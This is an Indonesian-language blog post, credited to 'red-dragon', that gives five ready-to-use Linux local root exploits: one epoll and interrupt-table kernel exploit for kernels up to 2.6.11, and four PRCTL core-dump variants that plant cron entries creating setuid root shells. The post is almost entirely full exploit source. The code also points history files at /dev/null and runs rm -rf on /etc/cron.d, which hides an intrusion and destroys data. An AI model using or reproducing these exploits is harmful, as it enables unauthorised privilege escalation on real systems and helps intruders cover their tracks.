- Linux Kernel 2.2.x - 2.4.x
- Linux Kernel < 2.4.20
- Linux Kernel 2.4.22
- Linux Kernel 2.4.x
- Linux Kernel 2.4/2.6
Kali ini saya akan memberikan 5 script lagi untuk melakukan proses rooting. Tentunya kernel yang dibahas kali ini, berbeda dengan versi kernel yang sudah dijelaskan sebelumnya.
Peringatan:
1. Linux Kernel <= 2.6.11
Code:
#define _GNU_SOURCE
#include <stdlib.h>#include <stdio.h>#include <sys/types.h>#include <sys/socket.h>#include <sys/epoll.h>#include <sys/mman.h>#include <sys/resource.h>#include <linux/capability.h>#include <asm/unistd.h>#ifndef __USE_GNU #define __USE_GNU#endif#include <unistd.h>#include <errno.h>#include <signal.h>#include <string.h>
/** * Relationship Variables * * 1: CONFIG_X86_PAE * see /lib/modules/`uname -r`/build/.config * 1.1: pse * 2: THREAD_SIZE * see include/asm/thread_info.h THREAD_SIZE define */
#define MAP (0xfffff000 - (1023*4096))#define MAP_PAE (0xfffff000 - (511*4096))#define MKPTE(addr) ((addr & (~4095)) | 0x27)#define MKPMD(x) (0x1e3|0x004)
////////////////////////////////////////////////
#define KRADPS1 "k-rad3"
#define kB * 1024#define MB * 1024 kB#define GB * 1024 MB
#define KRS "\033[1;30m[ \033[1;37m"#define KRE "\033[1;30m ]\033[0m"#define KRAD "\033[1;30m[\033[1;37m*\033[1;30m]\033[0m "#define KRADP "\033[1;30m[\033[1;37m+\033[1;30m]\033[0m "#define KRADM "\033[1;30m[\033[1;37m-\033[1;30m]\033[0m "
#define SET_IDT_GATE(idt,ring,s,addr) \ (idt).off1 = addr & 0xffff; \ (idt).off2 = addr >> 16; \ (idt).sel = s; \ (idt).none = 0; \ (idt).flags = 0x8E | (ring << 5);
//config valstatic int havepse = 0;static int definePAE = 0;static int exploitway = 0;static int npages = 1;static int thread_size = 0;
static uid_t uid = 0;static unsigned long long *clear1;static char * progargv0;
struct idtr { unsigned short limit; unsigned int base;} __attribute__ ((packed));
struct idt { unsigned short off1; unsigned short sel; unsigned char none,flags; unsigned short off2;} __attribute__ ((packed));
#define __syscall_return(type, res) \do { \ if ((unsigned long)(res) >= (unsigned long)(-125)) { \ errno = -(res); \ res = -1; \ } \ return (type) (res); \} while (0)
#define _capget_macro(type,name,type1,arg1,type2,arg2) \ type name(type1 arg1,type2 arg2) \ { \ long __res; \ __asm__ volatile ( "int $0x80" \ : "=a" (__res) \ : "0" (__NR_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \ __syscall_return(type,__res); \ }
static inline _capget_macro(int,capget,void *,a,void *,b);
static int THREAD_SIZE_MASK =(-4096);
static void fatal(const char *message){ system("uname -a"); printf("[-] %s\n",message); exit(1);}
void kernel(unsigned * task){ unsigned * addr = task; /* looking for uids */
*clear1 = 0;
while (addr[0] != uid || addr[1] != uid || addr[2] != uid || addr[3] != uid ) addr++; addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */ addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */
} void kcode(void);void __kcode(void){ asm( "kcode: \n" "cld \n" " pusha \n" " pushl %es \n" " pushl %ds \n" " movl %ss,%edx \n" " movl %edx,%es \n" " movl %edx,%ds \n"); __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); asm( " andl %esp,%eax \n" " pushl (%eax) \n" " call kernel \n" " addl $4, %esp \n" " popl %ds \n" " popl %es \n" " popa \n" " cli \n" " iret \n" );}
void raise_cap(unsigned long *ts){/* must be on lower addresses because of kernel arg check :) */static struct __user_cap_header_struct head;static struct __user_cap_data_struct data;static struct __user_cap_data_struct n;
int i;
*clear1 = 0;head.version = 0x19980330;head.pid = 0;capget(&head, &data);/* scan the thread_struct */for (i = 0; i < 512; i++, ts++) { /* is it capabilities block? */ if ( (ts[0] == data.effective) && (ts[1] == data.inheritable) && (ts[2] == data.permitted)) { /* set effective cap to some val */ ts[0] = 0x12341234; capget(&head, &n); /* and test if it has changed */ if (n.effective == ts[0]) { /* if so, we're in :) */ ts[0] = ts[1] = ts[2] = 0xffffffff; return; } /* otherwise fix back the stuff (if we've not crashed already :) */ ts[0] = data.effective; }}return;}
void stub(void);void __stub(void){ asm ( "stub:;" " pusha;" ); __asm__("movl %0 ,%%eax" ::"m"(THREAD_SIZE_MASK) ); asm( " and %esp, %eax;" " pushl (%eax);" " call raise_cap;" " pop %eax;" " popa;" " iret;" );
}
/* write to kernel from buf, num bytes */static int kwrite(unsigned base, char *buf, int num){#define DIV 256#define RES 4
int efd, c, i, fd;int pi[2];struct epoll_event ev;int *stab;unsigned long ptr;int count;unsigned magic = 0xffffffff / 12 + 1;
printf("[+] kwrite base %p, buf %p,num %d\n", (void *)base,buf,num); /* initialize epoll */ efd = epoll_create(4096); if (efd < 0) return -1; ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP;
/* 12 bytes per fd + one more to be safely in stack space */ count = (num+11)/12+RES;
/* desc array */ stab = alloca((count+DIV-1)/DIV*sizeof(int));
for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) {
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0) return -1;
send(pi[0], "a", 1, 0); stab[i] = pi[1]; }
/* highest fd and first descriptor */ fd = pi[1]; /* we've to allocate this separately because we need to have it's fd preserved - using this we'll be writing actual bytes */ epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev); //printf("EPOLL_CTL_ADD count %u\n",count); for (i = 0, c = 0; i < (count-1); i++) { int n; n = dup2(stab[i/DIV], fd+2+(i % DIV)); if (n < 0) return -1; epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev); close(n); }
/* in 'n' we've the latest fd we're using to write data */ for (i = 0; i < ((num+7)/8); i++) { /* data being written from end */ memcpy(&ev.data, buf + num - 8 - i * 8, 8); epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev);
/* the actual kernel magic */ ptr = (base + num - (i*8)) - (count * 12); struct epoll_event *events =(struct epoll_event *)ptr; //printf("epoll_wait verify_area(%p,%p) addr %p %p\n",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic); int iret =epoll_wait(efd, (void *) ptr, magic, 31337); if (iret ==-1) { perror("epoll_wait"); fatal("This kernel not vulnerability!!!");
} /* don't ask why (rotten rb-trees) :) */ if (i) { //printf("epoll_wait verify_area(%p,%p) %p\n",ptr,magic* sizeof(struct epoll_event) ,magic); iret = epoll_wait(efd, (void *)ptr, magic, 31337); if (iret ==-1) { perror("epoll_wait"); fatal("This kernel not vulnerability!!!"); }
} }
close(efd); for (i = 3; i <= fd; i++) close(i); return 0; }
/* real-mode interrupt table fixup - point all interrupts to iret.let's hope this will shut up apm */static voidfixint(char *buf){unsigned *tab = (void *) buf;int i;
for (i = 0; i < 256; i++) tab[i] = 0x0000400; /* 0000:0400h */ /* iret */ buf[0x400] =0xcf; }
/* establish pte pointing to virtual addr 'addr' */static int map_pte(unsigned base, int pagenr, unsigned addr){ unsigned *buf = alloca(pagenr * 4096 + 8); buf[(pagenr) * 1024] = MKPTE(addr); buf[(pagenr) * 1024+1] = 0; fixint((void *)buf); return kwrite(base, (void *)buf, pagenr * 4096 + 4);}
/* make pme user can rw */static int map_pme(unsigned base, int pagenr, unsigned addr){ unsigned *buf = alloca(pagenr * 4096 + 32); buf[(pagenr) * 1024] = MKPMD(addr); buf[(pagenr) * 1024+1] = 0; buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000; buf[(pagenr) * 1024+3] = 0; fixint((void *)buf); return kwrite(base, (void *)buf, pagenr * 4096 + 4*3);}
static void error(int d){ printf(KRADM "y3r 422 12 n07 3r337 3nuPh!\n" KRAD "Try increase nrpages?\n"); exit(1);}
char *bashargv[] = { KRADPS1, NULL }; char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null", "HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null", "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };
static int exploit(unsigned kernelbase, int npages){ struct idt *idt; struct idtr idtr;
signal(SIGSEGV, error); signal(SIGBUS, error);
/* get idt descriptor addr */ asm ("sidt %0" : "=m" (idtr)); /* * if OS in vmware , idtr.base is not right,please fix it * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table * c0461000 D idt_table * //idtr.base = 0xc0461000; */ printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase); if ( !definePAE ) { map_pte(kernelbase, npages, idtr.base - kernelbase); // idt = pae?(void *)MAP_PAE:(void *)MAP; idt = (struct idt *)MAP; }else { /* TODO: pse disable case */ if ( !havepse) printf("[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\n"); map_pme(kernelbase, npages, idtr.base - kernelbase); idt = (struct idt *) idtr.base; }
#if 0 int * p = (int *) idt; int i; for (i=0;i<1024;i++,p++) printf( "* %p 0x%x\n",p,*p); fflush(stdout);#endif
/** * cleanup the stuff to prevent others spotting the gate * - must be done from ring 0 */ clear1 = (void *) &idt[0x7f]; printf("[+] idt[0x7f] addr %p\n",clear1);
if ( exploitway == 0) { SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode)); } else { SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); } //[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub)); /** * also can use [2] stub function,but it may cause this message * * Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531 * Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1 * Sep 11 13:11:59 AD4 kernel: [<c011ca30>] __might_sleep+0x7d/0x89 * Sep 11 13:11:59 AD4 kernel: [<c01270bd>] sys_capget+0x1d5/0x216 * Sep 11 13:11:59 AD4 kernel: [<c0301bfb>] syscall_call+0x7/0xb * Sep 11 13:11:59 AD4 kernel: [<c017007b>] pipe_writev+0x24/0x320 * Sep 11 13:11:59 AD4 kernel: [<c01619a4>] filp_close+0x59/0x5f * */
/* call raise_cap or kernel */ asm ("int $0x7f"); printf(KRADP "j00 1u(k7 k1d!\n"); setresuid(0, 0, 0); setresgid(0, 0, 0); char cmdbuf[1024]; snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0); system(cmdbuf); execve("/bin/sh", bashargv, bashenvp); exit(0);}
static void usage(char *n){ printf("\nUsage: %s\n",n); printf("\t-s forced cpu flag pse \n"); printf("\t-a define CONFIG_X86_PAE,default none\n"); printf("\t-e <num> have two kernel code,default 0\n"); printf("\t-p <num> alloc pages(4k) ,default 1. Increase from 1 to 7\n" "\t\tThe higher number the more likely it will crash\n"); printf("\t-t <num> default 0 \n" "\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n"); printf("\n"); _exit(1);}
/*read /proc/cpuinfo to set havepse*/static void read_proc(void){ FILE * fp; char * line = NULL; size_t len = 0; ssize_t read; printf("[+] try open /proc/cpuinfo .."); fp = fopen("/proc/cpuinfo", "r"); if (fp == NULL) { printf(" failed!!\n"); return; } printf(" ok!!\n"); int cpus = 0; int pse = 0; while ((read = getline(&line, &len, fp)) != -1) {
if (strstr(line,"flags")) { if(strstr(line ,"pse ")) { pse ++; } }
} fclose(fp); if (line) free(line); if ( pse ) { printf("[+] find cpu flag pse in /proc/cpuinfo\n"); havepse = 1; }
return ;
}
static void get_config(int ac, char **av){ uid = getuid(); progargv0 = av[0];
int r; while(ac) { r = getopt(ac, av, "e:p:t:ash"); if(r<0) break;
switch(r) {
case 's' : //pse havepse = 1; break;
case 'a' : //define CONFIG_X86_PAE definePAE = 1; break;
case 'e' : exploitway = atoi(optarg); if(exploitway<0) fatal("bad exploitway value"); break;
case 'p' : npages = atoi(optarg); break; case 't' : thread_size = atoi(optarg); break; case 'h' : default: usage(av[0]); break; } }
THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192);
read_proc();}
static void print_config(unsigned long kernebase){ printf("[+] CONFIG_X86_PAE :%s\n", definePAE ?"ok":"none"); printf("[+] Cpu flag: pse %s\n", havepse ?"ok":"none"); printf("[+] Exploit Way : %d\n", exploitway); printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n", npages,kernebase,kernebase+npages*4 kB); printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size); fflush(stdout);}
void prepare(void){ if (geteuid() == 0) { setresuid(0, 0, 0); setresgid(0, 0, 0); execve("/bin/sh", bashargv, bashenvp); fatal("[-] Unable to spawn shell"); }}
intmain(int argc, char **argv){ char eater[65536]; unsigned long kernelbase;
/* unlink(argv[0]); */ // sync(); printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n" KRS "Discovered Jan 2005 by sd <sd@fucksheep.org>" KRE "\n" KRS "Modified 2005/9 by alert7 <alert7@xfocus.org>" KRE "\n");
if ( (unsigned long)eater > 0xc0000000) { printf("[!Waring!] TODO:use stack > 0xc0000000 \n"); return 0; } prepare(); get_config(argc,argv);
kernelbase =(unsigned long)eater ; kernelbase +=0x0fffffff; kernelbase &=0xf0000000; print_config(kernelbase);
exploit(kernelbase, npages<0?-npages:npages);
return 0;
}
2. Linux Kernel 2.6.13 <= 2.6.17.4 [Versi 1]
Code:
#include <stdio.h>#include <sys/time.h>#include <sys/resource.h>#include <unistd.h>#include <linux/prctl.h>#include <stdlib.h>#include <sys/types.h>#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() { int child; struct rlimit corelimit; printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n"); printf("By: dreyer & RoMaNSoFt\n"); printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); }
kill(child, SIGSEGV);
printf("[*] Sleeping for aprox. one minute (** please wait **)\n"); sleep(62);
printf("[*] Running shell (remember to remove /tmp/sh when finished) ...\n"); system("/tmp/sh -i");}
3. Linux Kernel 2.6.13 <= 2.6.17.4 [Versi 2]
Code:
#!/bin/sh## PRCTL local root exp By: Sunix# + effected systems 2.6.13<= x <=2.6.17.4 + 2.6.9-22.ELsmp# tested on Intel(R) Xeon(TM) CPU 3.20GHz# kernel 2.6.9-22.ELsmp# maybe others ...# Tx to drayer & RoMaNSoFt for their clear code...## zmia23@yahoo.com
cat > /tmp/getsuid.c << __EOF__#include <stdio.h>#include <sys/time.h>#include <sys/resource.h>#include <unistd.h>#include <linux/prctl.h>#include <stdlib.h>#include <sys/types.h>#include <signal.h>
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root chown root.root /tmp/s ; chmod 4777 /tmp/s ; rm -f /etc/cron.d/core\n";
int main() { int child; struct rlimit corelimit; corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit); if ( !( child = fork() )) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(200); exit(1); } kill(child, SIGSEGV); sleep(120);}__EOF__
cat > /tmp/s.c << __EOF__#include<stdio.h>main(void){setgid(0);setuid(0);system("/bin/sh");system("rm -rf /tmp/s");system("rm -rf /etc/cron.d/*");return 0;}__EOF__echo "wait aprox 4 min to get sh"cd /tmpcc -o s s.ccc -o getsuid getsuid.c./getsuid./srm -rf getsuid*rm -rf s.crm -rf prctl.sh
4. Linux Kernel 2.6.13 <= 2.6.17.4 [Versi 3]
Code:
#include <sys/types.h>#include <sys/time.h>#include <sys/resource.h>#include <sys/prctl.h>#include <unistd.h>#include <stdio.h>#include <errno.h>#include <signal.h>#include <stdlib.h>#include <time.h>
#define CROND "/etc/cron.d"#define BUFSIZE 2048
struct rlimit myrlimit={RLIM_INFINITY, RLIM_INFINITY};
char crontemplate[]="#/etc/cron.d/core suid_dumpable exploit\n""SHELL=/bin/sh\n""PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n""#%s* * * * * root chown root:root %s && chmod 4755 %s && rm -rf %s && kill -USR1 %d\n";
char cronstring[BUFSIZE];char fname[BUFSIZE];
struct timeval te;
void sh(int sn) { execl(fname, fname, (char *) NULL);}
int main(int argc, char *argv[]) {
int nw, pid;
if (geteuid() == 0) { printf("[+] getting root shell\n"); setuid(0); setgid(0); if (execl("/bin/sh", "/bin/sh", (char *) NULL)) { perror("[-] execle"); return 1; } }
printf("\nprctl() suidsafe exploit\n\n(C) Julien TINNES\n\n");
/* get our file name */ if (readlink("/proc/self/exe", fname, sizeof(fname)) == -1) { perror("[-] readlink"); printf("This is not fatal, rewrite the exploit\n"); }
if (signal(SIGUSR1, sh) == SIG_ERR) { perror("[-] signal"); return 1; } printf("[+] Installed signal handler\n");
/* Let us create core files */ setrlimit(RLIMIT_CORE, &myrlimit); if (chdir(CROND) == -1) { perror("[-] chdir"); return 1; }
/* exploit the flaw */ if (prctl(PR_SET_DUMPABLE, 2) == -1) { perror("[-] prtctl"); printf("Is you kernel version >= 2.6.13 ?\n"); return 1; }
printf("[+] We are suidsafe dumpable!\n");
/* Forge the string for our core dump */ nw=snprintf(cronstring, sizeof(cronstring), crontemplate, "\n", fname, fname, CROND"/core", getpid()); if (nw >= sizeof(cronstring)) { printf("[-] cronstring is too small\n"); return 1; } printf("[+] Malicious string forged\n");
if ((pid=fork()) == -1) { perror("[-] fork"); return 1; }
if (pid == 0) { /* This is not the good way to do it ;) */ sleep(120); exit(0); }
/* SEGFAULT the child */ printf("[+] Segfaulting child\n"); if (kill(pid, 11) == -1) { perror("[-] kill"); return 1; } if (gettimeofday(&te, NULL) == 0) printf("[+] Waiting for exploit to succeed (~%ld seconds)\n", 60 - (te.tv_sec%60)); sleep(120);
printf("[-] It looks like the exploit failed\n");
return 1;}
5. Linux Kernel 2.6.13 <= 2.6.17.4 [Versi 4]
Code:
#include <stdio.h>#include <unistd.h>#include <stdlib.h>#include <signal.h>#include <sys/stat.h>#include <sys/resource.h>#include <sys/prctl.h>
#define INFO1 "raptor_prctl.c - Linux 2.6.x suid_dumpable vulnerability"#define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
char payload[] = /* commands to be executed by privileged crond */"\nSHELL=/bin/sh\nPATH=/usr/bin:/usr/sbin:/sbin:/bin\n* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/cron.d/core\n";
char pwnage[] = /* build setuid() helper to circumvent bash checks */"echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
int main(void){ int pid, i; struct rlimit corelimit; struct stat st;
/* print exploit information */ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* prepare the setuid() helper */ system(pwnage);
/* set core size to unlimited */ corelimit.rlim_cur = RLIM_INFINITY; corelimit.rlim_max = RLIM_INFINITY; setrlimit(RLIMIT_CORE, &corelimit);
/* let's do the PR_SET_DUMPABLE magic */ if (!(pid = fork())) { chdir("/etc/cron.d"); prctl(PR_SET_DUMPABLE, 2); sleep(666); exit(1); } kill(pid, SIGSEGV);
/* did it work? */ sleep(3); if (stat("/etc/cron.d/core", &st) < 0) { fprintf(stderr, "Error: Not vulnerable? See comments.\n"); exit(1); }
fprintf(stderr, "Ready to uncork the champagne? "); fprintf(stderr, "Please wait a couple of minutes;)\n");
/* wait for crond to execute our evil entry */ for (i = 0; i < 124; i += 2) { if (stat("/tmp/pwned", &st) < 0) { fprintf(stderr, "\nError: Check /tmp/pwned!\n"); exit(1); } if (st.st_uid == 0) break; fprintf(stderr, "."); sleep(2); }
/* timeout reached? */ if (i > 120) { fprintf(stderr, "\nTimeout: Check /tmp/pwned!\n"); exit(1); }
/* total pwnage */ fprintf(stderr, "CAMPIONI DEL MONDO!\n\n"); system("/tmp/pwned"); exit(0);}
created by : red-dragon
0 comment:
Post a Comment